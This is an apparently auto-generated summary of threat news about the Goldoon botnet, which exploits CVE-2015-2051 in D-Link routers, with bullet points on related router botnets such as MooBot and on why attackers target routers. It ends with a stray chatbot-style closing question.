May 2, 2024 at 06:27AM
A new botnet named Goldoon exploits D-Link routers through a long-standing vulnerability, allowing for remote code execution. This botnet uses a dropper script to download and execute the Goldoon malware, enabling diverse attack methods, including DDoS flooding. This development reflects the persistent evolution of botnets, which increasingly target routers for various illicit activities.
Summary of Meeting Notes:
– A new botnet called Goldoon is targeting D-Link routers by exploiting the decade-old critical security flaw CVE-2015-2051.
– Attackers can gain complete control of compromised devices, extract system information, and use them for further attacks, including DDoS.
– The botnet activity spiked around April 9, 2024, and targets various Linux system architectures.
– Goldoon malware establishes persistence on compromised devices and contacts a C2 server for follow-up actions, including 27 different DDoS flood attack methods.
– Cybercriminals and APT actors are interested in compromised routers for various purposes, including using them as an anonymization layer and as covert listening posts.
– U.S. government dismantled parts of a botnet called MooBot, primarily leveraging Ubiquiti EdgeRouters.
– Some threat actors infect Ubiquiti routers with malware and use them as exit nodes in a residential proxy botnet for various malicious activities, including cryptocurrency mining and spear phishing.
– Internet routers are popular assets for threat actors due to reduced security monitoring, less stringent password policies, infrequent updates, and powerful operating systems allowing installation of various types of malware.
Follow us on Twitter and LinkedIn for more exclusive content.
Is there anything else you would like to know or discuss further?